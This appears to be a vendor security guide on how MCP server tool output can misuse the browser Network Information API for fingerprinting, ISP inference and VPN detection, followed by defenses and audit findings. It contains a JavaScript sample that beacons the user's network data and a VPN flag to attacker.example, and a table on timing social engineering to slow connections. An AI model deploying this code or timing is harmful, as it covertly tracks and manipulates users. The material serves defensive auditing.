Security Guide
MCP server Network Information API security — navigator.connection fingerprinting, ISP inference, and VPN detection
The Network Information API exposes navigator.connection which returns effectiveType (slow-2g / 2g / 3g / 4g), downlink (Mbps), rtt (milliseconds), and saveData — no permission required. In an MCP server context tool output can use these values to fingerprint the user's network environment, infer whether they are on corporate WiFi or residential broadband, detect VPN use through RTT/effectiveType discrepancies, and time social engineering attacks to moments when the user is on a slow or metered connection. No Permissions-Policy directive controls the Network Information API.
What the Network Information API provides
// Network Information API — no permission required
const conn = navigator.connection;
// NetworkInformation properties:
conn.effectiveType; // 'slow-2g' | '2g' | '3g' | '4g' — derived from RTT + downlink
conn.downlink; // estimated downlink in Mbps (rounded to 25 kbps increments)
conn.rtt; // estimated RTT in milliseconds (rounded to 25ms increments)
conn.saveData; // boolean — true if user has enabled data saver mode
// Change event fires when network conditions change significantly
conn.addEventListener('change', () => {
console.log(conn.effectiveType, conn.rtt, conn.downlink);
});
Fingerprinting via network characteristics
Network performance metrics are semi-unique because they reflect the combination of the user's ISP, geographic location, time of day, and device hardware:
| Property | Typical values | Fingerprint signal |
|---|---|---|
effectiveType |
4g (most users on broadband/LTE); 3g on weak LTE; 2g on slow cellular |
Network class; cellular vs broadband distinction |
rtt |
5–30ms on home fiber; 30–80ms on cable; 80–200ms on LTE; 200–500ms on 3G | ISP inference — ISPs have characteristic RTT ranges; corporate VPNs add 20–100ms overhead |
downlink |
1–10 Mbps on LTE; 10–100 Mbps on cable; 100–1000 Mbps on fiber | Broadband tier; device-level bandwidth limit; differentiates corporate managed networks |
saveData |
true on metered mobile connections; false on WiFi |
Metered connection indicator; on-the-go vs. stationary usage |
RTT rounding limits precision but doesn't prevent fingerprinting. Chrome rounds rtt to the nearest 25ms and downlink to the nearest 25 kbps to reduce fingerprinting resolution. However, the rounded values are still sufficient to distinguish ISP class (fiber vs cable vs LTE vs 3G), and combined with other browser fingerprinting signals, they significantly narrow the device identity space.
VPN detection via RTT/effectiveType discrepancy
A VPN adds a tunneling overhead of 20–100ms to round-trip time. When the browser's effectiveType is 4g (implying low RTT) but the measured TCP/HTTP RTT to a known-fast endpoint is high, the discrepancy suggests a VPN tunnel is present:
// VPN detection heuristic using Network Information API + performance.now() timing
const conn = navigator.connection;
const reportedRtt = conn.rtt; // browser's estimate, may be stale
// Measure actual RTT to a controlled fast endpoint
const t0 = performance.now();
fetch('https://attacker.example/ping?t=' + t0, { mode: 'no-cors', cache: 'no-store' })
.then(() => {
const actualRtt = Math.round(performance.now() - t0);
const vpnLikely = (actualRtt - reportedRtt) > 60; // 60ms+ overhead suggests VPN tunnel
navigator.sendBeacon('https://attacker.example/net', JSON.stringify({
effectiveType: conn.effectiveType,
reportedRtt,
actualRtt,
downlink: conn.downlink,
saveData: conn.saveData,
vpnDetected: vpnLikely
}));
});
VPN detection has real security implications. Knowing a user is behind a VPN changes the attacker's model — they can infer the user is in a corporate environment, handling sensitive data, or in a jurisdiction where VPN use is common for privacy reasons. If corporate policy requires VPN for sensitive work, detecting VPN status can help an attacker identify high-value sessions.
Attack timing and social engineering
Network conditions influence user behavior. An attacker can time specific social engineering actions to network state:
| Network state | User behavior implication | Attack opportunity |
|---|---|---|
effectiveType: '2g' or '3g' |
User on slow connection; may be impatient, less careful | Prompt for quick decisions; rushed confirmation dialogs more likely to be accepted |
saveData: true |
User on metered connection; conserving data | Offer "compressed" alternative that routes through attacker proxy |
| RTT spike (sudden increase) | User's connection degraded; likely mobile/commuting | Timing signal for when user is distracted or mobile |
Transition from 4g to 3g |
User moved out of strong cell coverage; likely in transit | Location inference without GPS — movement context identified |
Browser support
| Browser | Status |
|---|---|
| Chrome / Chromium / Edge | Shipped — available and returns real values |
| Firefox | Shipped — partial implementation; type property not available |
| Safari / WebKit | Not implemented — WebKit intentionally omitted for privacy |
| Electron-based MCP clients | Available (Chromium engine) |
Defenses
There is no Permissions-Policy directive for the Network Information API. Available defenses are architectural:
| Defense | Effect | Cost |
|---|---|---|
| Cross-origin iframe sandboxing for tool output | navigator.connection returns undefined or throws in sandboxed cross-origin iframes on some browsers |
Requires cross-origin rendering architecture |
| Content Security Policy blocking exfiltration destinations | connect-src 'self' blocks fetch/sendBeacon to attacker infrastructure |
Does not prevent reading the data; only blocks exfiltration |
Electron session.setPermissionRequestHandler |
Does not apply — Network Information API requires no permission request | N/A |
Findings SkillAudit reports
navigator.connection properties followed by an exfiltration call — network fingerprint confirmed being sent to external endpoint
navigator.connection.rtt with a fetch-based RTT measurement — VPN detection heuristic identified
conn.saveData or conn.effectiveType and conditionally branching on result — network-state-aware attack flow identified
connect-src CSP limiting exfiltration destinations — network data readable and exfiltrable without restriction
Related guides: Battery Status API fingerprinting, Local Font Access API fingerprinting, Generic Sensor API security.
Get a graded audit. Paste your MCP server's GitHub URL at skillaudit.dev for a report covering the Network Information API, all fingerprinting surfaces, and your full browser permission posture — in 60 seconds.